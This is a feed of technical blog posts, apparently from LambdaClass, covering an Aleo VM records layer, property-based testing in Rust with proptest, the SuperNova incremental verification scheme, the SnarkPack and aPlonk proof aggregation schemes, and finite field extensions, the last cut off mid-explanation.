Because Aleo is entirely private, a transaction can’t just publish the records it wants to spend along with a signature; it has to prove</em> ownership and existence of records in zero knowledge, then encrypt</em> the records so only its owner can decrypt on-chain.</p>
This means that, to integrate with the consensus layer and get a fully functional blockchain, we need a bit more. The VM can prove the correct execution of programs, but the Zero-Knowledge proof that comes with a transaction also needs to include the following:</p>
    * A signature in Zero-Knowledge, proof that the signature provided is the correct one. Remember, we can't just show the user's address sending the transaction.</span></span>
    * A proof that the caller of the transaction actually _owns_ the record they're spending.</span></span>
    * A proof that the records being spent are on-chain. This is essentially verifying a Merkle path in Zero-Knowledge.</span></span>
    * A proof that the input records have not been spent. This is a bit involved as it requires deriving a record's `serial number` (think of it as the `nullifier` if you know ZCash) in Zero-Knowledge.</span></span></code></pre>
We also talked about how records should be stored encrypted on-chain so that only someone possessing the record owner’s view key can decrypt them (in Aleo, the view key</code> is just another key tied to an account that allows record decryption).</p>
There’s a catch here, though. When, for instance, user A wants to send money to user B, they have to create a record owned by B and encrypt it so that only B can decrypt it. But A</code> does not necessarily have B</code>’s view key, only their address. This means the encryption scheme used by Aleo cannot be symmetric, as that would require user A</code> to have B</code>’s view key to send them money, not just their address.</p>
To accomplish this, records are encrypted using a scheme called ECIES</code> (Elliptic Curve Integrated Encryption Scheme). We’re not going to go into detail about how it works, but it’s a combination of a Diffie-Hellman key exchange with a symmetric encryption scheme.</p>
We introduced a middle layer between our VM and the Consensus Layer to solve all the problems discussed above. This middle layer handles everything related to records, their encryption, and the snarks required for the state transition proofs.</p>
In the original SnarkVM implementation, this middle layer does not really exist, as it’s part of the VM itself, but we found it more beneficial to separate these two concerns.</p>
Work in Progress</h2>
This project is still in active development, and a few things are being worked on. They include:</p>
    * Support for some data types and instructions on the VM, including the `group` data type (elliptic curve elements) and things like `BHP` commitments. You can check out a complete list on [the README](https://github.com/lambdaclass/aleo_lambda_vm).</span></span>
    * Some of the circuits mentioned above prove the correctness of state transitions.</span></span>
    * The generation of the proof that input records exist on-chain.</span></span>
    * Due to how we store record information on the blockchain and considering the privacy requirements of the blockchain, asking for a user balance or unspent records from the CLI is currently not trivial: We need to ask for all records that have ever existed in addition to all serial numbers from records that have been spent and attempt to decrypt them on the user's side. Some strategies to optimize this process include keeping track of records locally and only adding newly-created ones as the blockchain grows.</span></span></code></pre>
We plan to finish these tasks in the next four weeks. While many things could be improved, the project is already production ready.</p>
We have many ideas and comments about improving the SnarkVM and Aleo in general, but we will leave that for another series of posts.</p>


What is property-based testing?  Two examples in Rust
Unknown — Fri, 03 Feb 2023 00:00:00 +0000
This article will explore property-based tests and demonstrate their use in two of our open-source projects.

First, let’s explain what a property-based test (PBT) is: If a picture is worth a thousand words, a PBT is worth a thousand unit tests (although this is tunable, as we will see later).

It was born in the functional programming community and is very different from conventional methods. It’s a great tool to consider when testing the correctness of our programs.</p>
As its name suggests, it is based on testing the properties of our code. In other words, invariants or behavior that we expect to be consistent across inputs. When we write a unit test, we test a function/method for a specific set of parameters. So, we usually test with a representative (but small) number of inputs where we think the code may hide bugs. In contrast, a property-based test generates many random inputs and checks that the property is met for all of them. If it finds an unsatisfied value, it proceeds with a shrinking process to find the smallest input that breaks the property. That way, it is easier to reproduce the issue.</p>
A First Example</h2>
Enough talk; let us use a simple example to show how it works in practice. We’ll work with Rust to illustrate the benefits of this way of testing.</p>
There are several libraries for doing property-based tests in Rust, but we chose proptest</a> because it’s straightforward to use and is being actively maintained.</p>
In this example, we create a test for a function that adds two positive numbers. The test checks a property of positive number addition: the result is greater than each of the individual parts. We use the prop_assert!</code> macro to verify that the property holds.</p>
use proptest::prelude::*;</span></span>
</span>
fn add(a: i32, b: i32) -> i32 {</span></span>
	a + b</span></span>
}  </span></span>
</span>
proptest! {</span></span>
	// Generate 1000 tests.</span></span>
	#![proptest_config(ProptestConfig::with_cases(1000))]</span></span>
	#[test]</span></span>
	fn test_add(a in 0..1000i32, b in 0..1000i32) {</span></span>
		let sum = add(a, b);</span></span>
		prop_assert!(sum >= a);</span></span>
		prop_assert!(sum >= b);</span></span>
		prop_assert_eq!(a + b, sum);</span></span>
	}</span></span>
}</span></span></code></pre>
Let us see what happens if we change the first property to an incorrect one:</p>
// prop_assert!(sum >= a); previous line</span></span>
prop_assert!(sum <= a)</span></span></code></pre>
We will receive a report with the smallest instance that breaks the property.</p>
---- test_add stdout ----</span></span>
thread 'test_add' panicked at 'Test failed: assertion failed: sum <= a at src/lib.rs:13; minimal failing input: a = 0, b = 1</span></span>
        successes: 0</span></span>
        local rejects: 0</span></span>
        global rejects: 0</span></span>
', src/lib.rs:7:1</span></span>
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace</span></span></code></pre>
To build tests for more complex structures, we can use regular expressions (if we have a way of building our data type from a string) or use Strategies</a>, which are used to control how values are generated and how the shrinking process is done.</p>
Case studies</h2>
Case study 1: cairo-rs</h3>
Let’s start with a more practical example. At LambdaClass, we developed a Rust implementation of the Cairo virtual machine</a>. Cairo stands for CPU Algebraic Intermediate Representation. It’s a programming language for writing provable programs, where one party can prove to another that a computation was executed correctly by producing a zero-knowledge proof.</p>
Executing a program made in Cairo involves operating with a lot of field elements (i.e., numbers between 0 and a huge prime number). So every operation (addition, subtraction, multiplication, and division) needs to evaluate to a felt (field element) in the range [0; PRIME -1].</p>
proptest! {</span></span>
</span>
  #[test]</span></span>
  // Property-based test that ensures, for 100 felt values that are randomly generated each time tests are run, that a new felt doesn't fall outside the range  [0, PRIME-1].</span></span>
  // In this and some of the following tests, The value of {x} can be either [0]  or a huge number to try to overflow the value of {p} and thus ensure the modular arithmetic is working correctly.</span></span>
  fn new_in_range(ref x in "(0|[1-9][0-9]*)") {</span></span>
    let x = &Felt::parse_bytes(x.as_bytes(), 10).unwrap();</span></span>
    let p = &BigUint::parse_bytes(PRIME_STR[2..].as_bytes(), 16).unwrap();</span></span>
    prop_assert!(&x.to_biguint() < p);</span></span>
  }</span></span>
</span>
  #[test]</span></span>
  // Property-based test that ensures, for 100 felt values that are randomly generated each time tests are run, that the negative of a felt doesn't fall outside the range [0, PRIME-1].</span></span>
  fn neg_in_range(ref x in "(0|[1-9][0-9]*)") {</span></span>
    let x = &Felt::parse_bytes(x.as_bytes(), 10).unwrap();</span></span>
    let neg = -x;</span></span>
    let as_uint = &neg.to_biguint();</span></span>
    let p = &BigUint::parse_bytes(PRIME_STR[2..].as_bytes(), 16).unwrap();</span></span>
</span>
    prop_assert!(as_uint < p);</span></span>
  }</span></span>
</span>
  #[test]</span></span>
  // Property-based test that ensures, for 100 {x} and {y} values that are randomly generated each time tests are run, that multiplication between two felts {x} and {y} and doesn't fall outside the range [0, PRIME-1]. The values of {x} and {y} can be either [0] or a very large number.</span></span>
  fn mul_in_range(ref x in "(0|[1-9][0-9]*)", ref y in "(0|[1-9][0-9]*)") {</span></span>
    let x = &Felt::parse_bytes(x.as_bytes(), 10).unwrap();</span></span>
    let y = &Felt::parse_bytes(y.as_bytes(), 10).unwrap();</span></span>
    let p = &BigUint::parse_bytes(PRIME_STR[2..].as_bytes(), 16).unwrap();</span></span>
    let prod = x * y;</span></span>
    let as_uint = &prod.to_biguint();</span></span>
</span>
    prop_assert!(as_uint < p, "{}", as_uint);</span></span>
  }</span></span></code></pre>
We already found two hard-to-find bugs by using a suite of property-based tests for each arithmetical operation. Also, it helped us easily change our field elements’ internal implementation to a more performant one and be confident that we didn’t break anything.</p>
Case study 2: Patricia Merkle Tree</h3>
At LambdaClass, we are also developing a Merkle Patricia tree library</a> (like those used in Ethereum and many other cryptography-related projects). To test the correctness of the implementation, we decided to make property-based tests by comparing the results of our library’s operations against the results of a reference implementation, cita-trie</a>.</p>
For testing, let’s generate some inputs for creating two trees: one using the reference implementation and one using our library.

This time the property that we want to test is that for every generated tree from our library, its root hash matches the root hash of the reference implementation.</p>
fn proptest_compare_root_hashes(path in vec(any::<u8>(), 1..32), value in vec(any::<u8>(), 1..100)) {</span></span>
</span>
  use cita_trie::MemoryDB;</span></span>
  use cita_trie::{PatriciaTrie, Trie};</span></span>
  use hasher::HasherKeccak;</span></span>
  </span></span>
  // Prepare the data for inserting it into the tree</span></span>
  let data: Vec<(Vec<u8>, Vec<u8>)> = vec![(path, value)];</span></span>
</span>
  // Creates an empty patricia Merkle tree using our library and </span></span>
  // Keccak256 as the hashing algorithm.</span></span>
  let mut tree = PatriciaMerkleTree::<_, _, Keccak256>::new();</span></span>
</span>
  // insert the data into the tree.</span></span>
  for (key, val) in data.clone().into_iter() {</span></span>
    tree.insert(key, val);</span></span>
  }</span></span>
</span>
  // computes the root hash using our library</span></span>
  let root_hash = tree.compute_hash().as_slice().to_vec();</span></span>
</span>
  // Creates a cita-trie implementation of the</span></span>
  // Patricia Merkle tree.</span></span>
  let memdb = Arc::new(MemoryDB::new(true));</span></span>
  let hasher = Arc::new(HasherKeccak::new());</span></span>
  let mut trie = PatriciaTrie::new(Arc::clone(&memdb), Arc::clone(&hasher));</span></span>
</span>
  // Insert the data into the cita-trie tree.</span></span>
  for (key, value) in data {</span></span>
    trie.insert(key.to_vec(), value.to_vec()).unwrap();</span></span>
  }</span></span>
  // Calculates the cita-tree's root hash.</span></span>
  let reference_root = trie.root().unwrap();</span></span>
</span>
  prop_assert_eq!(</span></span>
    reference_root,</span></span>
    root_hash</span></span>
  );</span></span>
}</span></span></code></pre>
Using this technique, we can ensure that our implementation behaves the same way as the reference one.</p>
Closing words</h2>
In conclusion, property-based testing is a powerful and effective way to test the correctness of our programs. Testing properties helps find bugs and ensure that our program meets invariants across a wide range of inputs. In this article, we demonstrated property-based testing in two open-source projects. We hope you consider it in your testing practices.</p>
Related Resources</h2>
    1. QuickCheck original paper <https://www.cs.tufts.edu/~nr/cs257/archive/john-hughes/quick.pdf></span></span>
    2. _Property-Based Testing with PropEr, Erlang, and Elixir_ by Fred Hebert <https://propertesting.com/></span></span>
    3. Rust port of QuickCheck <https://github.com/BurntSushi/quickcheck></span></span>
    4. proptest book <https://altsysrq.github.io/proptest-book/intro.html></span></span></code></pre>


Champagne SuperNova, incrementally verifiable computation
Unknown — Thu, 02 Feb 2023 00:00:00 +0000
Introduction</h2>
In the lasts posts we’ve been writing about proving systems and incremental verifiable computation:</p>
    * [Pinocchio Virtual Machine: Nearly Practical Verifiable Computation](/pinocchio-virtual-machine-nearly-practical-verifiable-computation/)</span></span>
    * [Decentralized private computation: ZEXE and VERI-ZEXE](/decentralized-private-computations-zexe-and-veri-zexe/)</span></span>
    * [Incrementally verifiable computation: NOVA](/incrementally-verifiable-computation-nova/)</span></span></code></pre>
Incremental proof systems offer some advantages over conventional proving systems:</p>
    * They do not require static bounds on loop iterations, making them better suited for programs with dynamic flow control.</span></span>
    * They require minimal memory overhead, as the prover only needs space proportional to the necessary space to perform the step instead of storing the whole computation trace.</span></span>
    * They are well suited for the distribution and parallelization of proof generation.  </span></span></code></pre>
The prover can run the program, keeping track of the input and output variables and state changes, and then generate the proofs in parallel using CPU or GPU for each step of the computation. Better still, the proofs can be conveniently aggregated into a single one, which the verifier can check.</p>

Incrementally verifiable computation</a> (IVC) offers an approach to prove the integrity of machine executions. To use ICV, we need to design a universal circuit that can perform any machine-supported instruction. At each step, we have to call this circuit. This is inconvenient since the cost of proving a step is proportional to the size of the universal circuit, even if the program only executes one of the supported instructions at a much lower cost. One way to deal with this shortcoming is by constructing virtual machines with a minimal instruction set to bound the size of the universal circuit.</p>
SuperNova</a> provides a cryptographic proof system (comprising a prover and a verifier) based on a virtual machine and a program designed to run over such a machine, satisfying the following properties:</p>
    * Succinctness: the size of the proof and the time to verify said proof are at most polylogarithmic in the execution time of the program.</span></span>
    * Zero-knowledge: The proof does not reveal anything other than the correct execution of the problem.</span></span>
    * Convenient cost profile: The cost of proving a step of the program is proportional to the size of the circuit representing such instruction.</span></span>
    * Incremental proof generation: the prover can generate a proof for each step of the program's execution independently and later combine those proofs into a single one without increasing the size of the proofs.</span></span></code></pre>
SuperNova leverages folding schemes (a cryptographic primitive used previously by Nova</a>), using relaxed-committed R1CS</a>, to realize a non-uniform IVC. SuperNova is a generalization of Nova, as it supports machines with a rich instruction set (Nova was limited to one instruction). In the following sections, we will break down the different components needed for SuperNova and how to achieve non-uniform IVC.</p>
Commitment scheme for vectors</h2>
A commitment scheme</a> for vectors is a collection of three efficient algorithms:</p>
    * Parameter generation, $\mathrm{Gen}(1^\lambda)=pp$: given a security level parameter, $\lambda$, the algorithm outputs public parameters $pp$.</span></span>
    * Commit, $\mathrm{commit}(pp,x,r)=\mathrm{cm}$: given the public parameters, a vector, and some randomness, $r$, outputs a commitment $\mathrm{cm}$.</span></span>
    * Open, $\mathrm{open}(pp,\mathrm{cm},x,r)={0,1}$: given a commitment, the vector, randomness, and public parameters, the algorithm verifies whether the commitment given corresponds to the vector $x$.</span></span></code></pre>
The commitment scheme has to satisfy the following properties:</p>
    * Binding: given a commitment $\mathrm{cm}$, it is impossible to find two $x_1$, $x_2$ such that $\mathrm{commit}(pp,x_1,r)=\mathrm{commit}(pp,x_2,r)$. Simply put, the commitment binds us to our original value $x$.</span></span>
    * Hiding: the commitment reveals nothing from $x$.</span></span></code></pre>
The following two properties are useful in our context and satisfied by some commitment schemes, such as Pedersen’s:</p>
    * Additively homomorphic: given $x_1$, $x_2$ a commitment is additively homomorphic if $\mathrm{commit}(pp,x_1+x_2,r_1+r_2)=\mathrm{commit}(pp,x_1,r_1)+\mathrm{commit}(pp,x_2,r_2)$.</span></span>
    * Succinct: the size of the commitment is much smaller than the corresponding vector (for example, $\mathrm{commit}(pp,x,r)=\mathcal{O}(\log(x))$).</span></span></code></pre>
SuperNova can be instantiated with any commitment scheme satisfying the four properties above, such as Pedersen’s, KZG, or Dory.</p>
Computational model of non-uniform IVC (NIVC)</h2>
We can think of the program as a collection of $n+1$ non-deterministic, polynomial time computable functions, ${f_1,f_2,…,f_n,\phi}$, where each function receives $k$ input and $k$ output variables; each $f_j$ can also take non-deterministic input. The function $\phi$ can take non-deterministic input variables and output an element $j=\phi(z=(x,w))$, choosing one of the $f_i$. Each function is represented as a quadratic rank-one constraint system (R1CS), an NP-complete problem. In IVC, the prover takes as input at step $k$ $(k,x_0,x)$ and a proof $\Pi_k$ that proves knowledge of witnesses $(w_0,w_1,…,w_{k-1})$ such that

$$ x_{j+1}=F(x_j,w_j) $$

for all $j=0,1,…,k$ we have $x=x_{k+1}$. In other words, given a proof that shows that the previous step has been computed correctly and the current state $x_k$, we get the next state $x_{k+1}$ and a proof $\Pi_{k+1}$ showing that we computed step $k$ correctly. In the NIVC setting, $\phi$ selects which function we are going to use,

$$ x_{j+1}=F_{\phi(x_j,w_j)} (x_j,w_j) $$</p>
At each step, SuperNova folds an R1CS instance and its witness, representing the last step of the program’s execution into a running instance (it takes two $N$-sized NP instances into a single $N$-sized NP instance). The prover uses an augmented circuit containing a verifier circuit and the circuit corresponding to the function $f_j$ being executed. The verifier circuit comprises the non-interactive folding scheme and a circuit for computing $\phi$. We will represent the augmented functions as $f^\prime_j$.</p>
One problem with the folding scheme is that we have multiple instructions, each having its R1CS representation. We could take the path of universal circuits, but this would make us pay a high cost for many cheap instructions. In Nova, we avoided the problem since we only had one type of instruction. To deal with multiple instructions, SuperNova works with $n$ running instances $U_i$, where $U_i(j)$ attests to all previous executions of $f^\prime_j$, up to step $i-1$. Therefore, checking all $U_i$ is equivalent to checking all $i-1$ steps. Each $f^\prime_j$ takes as input $u_i$, corresponding to step $i$, and folds it to the corresponding $U_i$ instance. We can think of it as looking at the function we want to execute and performing the instance folding with the one related to the previous executions. By doing so, we pay the cost for each instruction only when it is used, at the expense of keeping more running instances and updating accordingly.</p>
The verifier circuit corresponding to $f_j^\prime$ does the following steps:</p>
    1. Checks that $U_i$ and $pc_i=\phi(x_{i-1},w_{i-1})$ (the index of the function executed previously) are contained in the public output of the instance $u_i$. This enforces that the previous step produces both $U_i$ and $pc_i$.</span></span>
    2. Runs the folding scheme's verifier to fold an instance and updates the running instances, $U_{i+1}$.</span></span>
    3. Calls $\phi(x_i,w_i)=pc_{i+1}$ to obtain the index of the following function to invoke.</span></span></code></pre>Summary</h2>
IVC is a powerful cryptographic primitive which allows us to prove the integrity of computation in an incremental fashion. This strategy is well-suited for virtual machine executions and general programs with dynamic flow control. We could achieve this by using universal circuits, but at the expense of a considerable cost for each instruction, no matter how cheap it could be. Nova introduced folding schemes, allowing one to realize IVC for a single instruction. SuperNova generalizes Nova to multiple instructions by adding a selector function $\phi$, choosing the instruction to be executed at each step. To support several instructions, SuperNova needs to maintain separate bookkeeping for each function’s execution. This construction has many exciting applications since we could realize IVC without requiring expensive arbitrary circuits.</p>


Proof aggregation schemes:  SnarkPack and aPlonk
Unknown — Fri, 27 Jan 2023 00:00:00 +0000
Introduction</h2>
zk-SNARKs</a> are powerful cryptographic primitives, allowing one party, known as the prover, to show to a second party, the verifier, that he knows a given secret, without revealing anything about it. This has applications, for example, in decentralized private computations, where we can delegate an expensive computation to an untrusted server and receive cryptographic proof attesting to the correctness of the computation, without leaking sensitive information. We can also leverage zk-SNARKs to solve the problems of privacy and scalability affecting most decentralized ledgers. There, each node must perform the computation independently to check its validity. This means that the less powerful devices can act as bottlenecks, especially when the computations are expensive, affecting scalability. However, instead of having each node re-execute each computation, we could have them verify a short proof that shows that the computation is correct. In that case, we can lessen the burden on the entire system.</p>
One of the main problems with zk-SNARKs is the proof’s generation time. Typically, proof generation involves transforming computations into some NP-complete problem, where we can prove the correctness of the calculation. Among them are arithmetic circuit satisfiability</a> or systems of quadratic constraints (rank one constraint system, R1CS). We then have to perform some expensive computations, such as multiscalar multiplications (MSM</a>) and elliptic curve pairings to check the solution. Several strategies have been adopted to lessen the computational cost, such as proof composition, batching, recursion, dealing with an increased number of smaller proofs, and exploiting the advantages of polynomial commitment schemes.</p>
In a previous post</a>, we covered incrementally verifiable computation (IVC) and folding schemes, which give us ways to realize IVC in practice. We covered the basics of Nova</a> and how the folding scheme works. We will now turn our attention to proof aggregation schemes: SNARKPack</a> and aPlonK</a>. These allow us to reduce the total size of the proofs and their associated verification time: for \( n \) proofs, the size and verification time of the aggregated proof will be \( \mathcal{O}(n) \), which is a significant reduction, especially for a large number of proofs. SNARKPack is built on top of the Groth16 SNARK, while aPlonk works with the Plonk</a> proving system. Both are among the most widely used SNARKs and use trusted setups, resulting from setup ceremonies involving multi-party computations.</p>
SNARKPack</h2>
In the Groth16 scheme, a proof \( \pi \) consists of three elliptic curve</a> group elements, \( A,B,C \). Both \( A,B \) belong to the group \( \mathbb{G_1} \) and \( C \) belongs to the group \( \mathbb{G_2} \). The groups have the same order</a> (number of elements), \( p \) and are among the torsion groups of order \( p \) of the elliptic curve over an extension field. We can define a bilinear map (or pairing operation) by taking an element from each group and outputting an element on a third group \( \mathbb{G_t} \): \( e:\mathbb{G_1} \times \mathbb{G_2} \rightarrow \mathbb{G_t}\). The operation has to fulfill the property \( e( g^a , h^b ) = e( g , h )^{a b}\) to be bilinear. In the equation before, \( a,b \) are numbers, and \( g,h \) are the generators of the groups \( \mathbb{G_1} \) and \( \mathbb{G_2} \), respectively (we say an element of the group, \( g \), is a generator if any element in the group can be obtained by repeatedly adding it). We perform the proof verification in Groth16 via the pairing operation,

\[ e(A,C) = Ye(B,D)\]

where \( D \) is an element of \( \mathbb{G_2} \) and \( Y \) is an element of \( \mathbb{G_t} \). The main idea behind the aggregation of \( n \) Groth16 proofs is that we can verify all of them simultaneously by using a random linear combination (up to some tiny error). This way, we only need to perform one pairing operation instead of \( n \),

\[ \prod e(A_k,C_k)^{ r^k } = \prod Y_k^{ r^k } \prod e(B_k^{ r^k },D)\]

where \( r \) is a randomly sampled number, and \( \prod \) means that we take the product of all possible pairings.</p>
The following terms are defined to ease notation:

\( Z_{AC} = \prod e(A_k,C_k)^{ r^k } \)

\( Y_{prod} = \prod Y_k \)

\( Z_B = \prod e(B_k^{ r^{k} },D) \)

\( Z_{AC} = Y_{prod} Z_B \)

After checking that this last equation holds, we are left with the task of verifying that, for some initial committed vectors \( A=(A_1,A_2,…A_n) \), \( B=(B_1,B_2,…,B_n) \) and \( C=(C_1,C_2,…,C_n) \), \(Z_{AC},Z_B \) are consistent with those specifications. We check this using two inner pairing arguments:</p>
    1. The target inner pairing product (TIPP) shows that \\( Z_{AC} = \prod e( A_k , C_k )^{ r^k } \\).</span></span>
    2. The multi-exponentiation inner pairing product (MIPP) shows that \\( Z_B = \prod e( B_k^{ r^{k} }, D) \\).</span></span></code></pre>
We need efficient commitment schemes with homomorphic and collapsing properties to build these inner pairing products. We say that a commitment is additively homomorphic if, given two elements, \( a,b \), the commitment scheme satisfies that \( \mathrm{cm}(a+b)=\mathrm{cm}(a)+\mathrm{cm}(b) \). Pedersen and Kate-Zaverucha-Goldberg commitments have this property, for example. To achieve logarithmic proof size, the authors of SNARKPack use the same strategy as bulletproofs, which is based on an inner product argument. These commitments are also homomorphic in the key space: given two keys \( k_1,k_2 \) and for any message \( m \), we have that \( \mathrm{cm}(m,k_1+k_2)=\mathrm{cm}(m,k_1)+\mathrm{cm}(m,k_2)\).</p>
The protocol uses the trusted setups of two large setup ceremonies: Filecoin and Zcash. In Groth16, the structured reference string (SRS), which is the outcome of the ceremony, consists of the powers of a random element \( \tau \), hidden inside the groups \( \mathbb{G_1}, \mathbb{G_2} \). Given the generators \( g,h \), the SRS is given by \( {g, g^\tau , g^{ \tau^2 },…g^{ \tau^d }}={g,g_1,g_2,…} \) and \( {h, h^\tau , h^{ \tau^2 },…,h^{ \tau^d }}={h,h_1,h_2,…} \). These will allow us to commit to polynomials and verify claims over them.</p>
We can now create pair group commitments by using the two SRS. To ease notation, we will call</p>
    1. \\( w_1 = (g,g_{11}, h_{12},...) \\) and \\( v_1 = (h,h_{11},h_{12},...) \\) are the SRS for ceremony 1.</span></span>
    2. \\( w_2 = (g,g_{21}, h_{22},...) \\) and \\( v_2 = (h,h_{21},h_{22},...) \\) are the SRS for ceremony 2.</span></span></code></pre>
There are two versions of these commitments: single group and double group. The former takes as commitment key \( k_s=(v_1,v_2) \), while the latter uses \( k_d=(v_1,w_1,v_2,w_2) \).</p>
The single group commitment takes a vector \( A \) and the key \( k_s \) and outputs two group elements:

\[ \mathrm{cm_S}(A,k_s)=(t_A,u_A)\]

where

\( t_A=e(A_1,h)\times e(A_2,h_{11})\times e(A_3,h_{12})\times…. = A\cdot v_1 \)

\( t_A=e(A_1,h)\times e(A_2,h_{21})\times e(A_3,h_{22})\times…. = A\cdot v_2 \)</p>
The double commitment takes vectors \( A \) and \( C \) formed of elements in \( \mathbb{G_1} \) and \( \mathbb{G_2} \), respectively and \( k_d \) and outputs two elements:

\[ \mathrm{cm_d}(A,C)=(t_{AC},u_{AC}) \]

with

\( t_{AC} = (A\cdot v_1)(C\cdot w_1) = (\prod e(A_k,h_{1,{k-1}})(\prod e(g_{1,k-1},C_k)) \)

\( u_{AC}=(A\cdot v_2)(C\cdot w_2) = (\prod e(A_k,h_{2,{k-1}})(\prod e(g_{2,{k-1}},C_k)) \)</p>
We will use the double commitment in conjunction with TIPP to show that \( Z_{AC} = \prod e(A , C)^{ r^k } \), while the MIPP will be used with the single commitment to see that \( Z_B = \prod e(B_k^{ r^k },D) \). There are two relations to be checked:

\[ \mathcal{R_{MIPP}}={ (t_B,u_B,r,Z_B,B,r_v ): Z_B=B_k^{ r^k } \wedge (u_B,t_B) = \mathrm{cm_s}(B) \wedge (r_v)_{i} = r^{i-1} }\]</p>
\[ \mathcal{R_{TIPP}} = (t_{AC},u_{AC},r,Z_{AC},A,C,r_v ): Z_{AC} = \prod e(A_k,C_k)^{ r^k } \wedge \]</p>
\[ (u_{AC},t_{AC}) = \mathrm{cm_d}(A,C) \wedge (r_v)_{i} = r^{i-1} \]</p>
In simple words, in each relation, we check that the value is correct and that the commitments are valid.</p>
For the exact details of the proving and verification algorithms, we refer the reader to the source</a>.</p>
In the case studies shown, the aggregation scheme outperforms batch verification in size and time at slightly more than 100 proofs.</p>
aPlonk</h2>
aPlonk</a> builds on the ideas of SNARKPack, using a different proving system (Plonk) and introducing multi-polynomial commitments to achieve sublinear size in the number of polynomials. The key idea is to verify several proofs by performing a random linear combination of commitments and checking it. The notation is slightly different since the authors of aPlonk use additive notation when working with groups, whereas the authors of SNARKPack use multiplicative notation. If \( \mathrm{cm}(p_k) \) is a commitment to a polynomial \( p_k \) (which, if we use KZG commitments, is an elliptic curve element), then we can verify all of them by doing

\[ \sum r^k \mathrm{cm}(p_k)=\beta \]

and checking that \( \beta \), at point \( z \), opens (evaluates) to

\( v=\sum r^k v_k \)

where \( v_k \) is the value of \( p_k(z) \). Had we used multiplicative notation, the previous equation would have read

\[ \prod (\mathrm{cm}(p_k))^{ r^k }=\beta \]

To achieve the sublinear size, the prover will commit to the commitments of the polynomials, that is \( \beta=\mathrm{cm}(\mathrm{cm}(p_1),\mathrm{cm}(p_2)…)\).

Since we are calculating a linear combination using the powers of \( r \), it is natural to use a polynomial commitment scheme, such as KZG or inner product arguments (IPA).</p>
Plonk’s constraint system has the following expression

\[ q_{L_i}x_{a_i}+q_{R_i}x_{b_i}+q_{O_i}x_{C_i}+q_{M_i}x_{a_i}x_{b_i}+q_{C_i}=0\]

and can be extended to include higher-order terms or custom gates. For each \( q_k \) we can define an univariate polynomial, \( q_L(x),q_R(x),q_O(x),q_M(x),q_C(x) \) by having each polynomial evaluate to their corresponding \( q_{k_i} \) at the n primitive roots of unity \( \omega_i \) (We say that \( \omega_i) \) is a primitive n-th root of unity if \( \omega_i^n=1 \) and \( \omega_i^k \neq 1 \) if \( k < n \). In addition, the prover has to show that the relations between the indices \( a_i,b_i,c_i \) are related by permutations. These permutations are also expressed in terms of polynomials. Therefore, we have to commit to a total of 8 polynomials.</p>
One key building block is the multi-polynomial commitment scheme. This comprises of 5 efficient algorithms, \( \mathrm{setup},\mathrm{commit- polynomial},\mathrm{commit-evaluation},\mathrm{open},\mathrm{check}\); the main difference is the addition of the \( \mathrm{commit-evaluation} \) algorithm. The multi-polynomial commitment is built upon two polynomial commitment schemes: KZG and IPA.</p>
One important optimization is that all polynomials are evaluated at the same random challenge \( r \), given by the Fiat-Shamir heuristic. Therefore, provers must obtain \( r \) from the partial transcript of all proofs, requiring that the proofs of each statement run coordinately. Even if this prevents the construction of incrementally-verifiable computation (IVC), since in that case, the proofs are generated one after the other, the construction works well for validity rollups.</p>
Summary</h2>
Proof aggregation schemes are an alternative to reduce the size and verifying time of many zk-SNARKs. In particular, we can obtain proof sizes and verification times of order \( \mathcal{O}(\log(n)) \) for \( n \) proofs. Proof aggregation outperforms batching techniques for slightly more than 100 proofs and has a clear advantage when we add together more than 1000 proofs. The main building blocks to achieve these properties are homomorphic polynomial commitments (such as KZG), two trusted setups, and the fact that we can verify many proofs by taking a random linear combination, using as coefficients the powers of some number \( r \).</p>


Climbing the tower: field extensions
Unknown — Wed, 25 Jan 2023 00:00:00 +0000
Introduction</h2>
Finite fields are a central piece in every cryptography and zk-SNARKs</a>. The most common finite fields appearing in practice are the fields with prime order $\mathbb F_p$. There are multiple ways of defining them. A usual one is seeing $\mathbb F_p$ as the set

$$ \{0, 1, \cdots, p-1\}$$

together with the rule of addition and the rule of multiplication modulo $p$. But other finite fields play important roles, too. For example, when dealing with pairing-friendly elliptic curves. You may have seen them denoted by things like $\mathbb F_{p^n}$.

The usual way of defining and introducing them is through the theory of field extensions that involve quotients of polynomial rings</a>. It is the most natural and correct way from a mathematical standpoint, mainly to prove things about them. But going down that road can be obscure and confusing if you are unfamiliar with the mathematical tools involved.</p>
The idea is straightforward, and those fields are very concrete mathematical objects. This post aims to give a non-standard but more down-to-earth way of understanding extensions of finite fields.</p>
If you want to see examples of finite field extensions in zk-SNARKs, you can look at the arkworks</a> finite field arithmetic library, where they build field extensions to work with elliptic curve pairings.</p>
What is a field?</h2>
To kick this off, let’s revisit what a field is. The actual definition is here</a>.</p>
Loosely speaking, a field is a set $F$ with addition and multiplication rules that behave, for example, like real numbers. There has to be an element in $x_0 \in F$ that behaves like $0$. That means that $x_0 + x = x$ for all $x$ in $F$. We even denote this element just by $0$. Similarly, there has to be an element $1$ in $F$ such that $1\cdot x = x$ for all $x$ in $F$. They are called the neutral elements</em> of multiplication and addition, respectively. In $\mathbb F_p$, these are already denoted by $0$ and $1$, so no surprises there.</p>
A field also has to have a multiplicative inverse</em> for all elements different from $0$. This means that if $x$ is any element of $F$ different from $0$, there has to be another element $y$ such that $x\cdot y = 1$. This element $y$ is unique and is denoted by $x^{-1}$. For example, in $\mathbb F_3$ we have $2^{-1} = 2$.</p>
We can deduce lots of things from the defining properties of a field. We will need this one later: if $x\cdot x = 0$, then $x=0$.</p>
The case of complex numbers</h2>
Computer scientists are very good at naming things, like neural networks</em> and artificial intelligence</em>. Mathematicians, on the other hand, are very often terrible at it. Early in our lives, we encounter one of the worst examples: complex numbers</em>. There are at least three problems with them. First of all, the name. It biases everyone to think it’s a complex concept. Second, the obscure notation $a + bi$, and finally, the fact that the new symbol is called an imaginary number</em>. This makes an explosive combination and hides its simplicity. Complex numbers are just pairs of real numbers, also called the cartesian plane</em>. And the interesting thing is that there is a way to define addition and multiplication rules on this set of pairs that extends the ones of the real numbers. These even have geometric interpretations!</p>
We introduce this because we will take a similar approach to finite fields. The approach is: we start from a field, in this case, $\mathbb R$, with the usual addition and multiplication rules. We then add a new coordinate to obtain the pairs of real numbers $(a, b)$. This set is usually denoted $\mathbb R^2$. On this set we define the addition component-wise $(a,b) + (c, d) := (a+c, b+d)$. We then try to define a multiplication rule on it. That is, we want to come up with a rule for the expression $(a, b)\cdot(c, d)$ such that:</p>
    1. It forms a field together with the component-wise addition.</span></span>
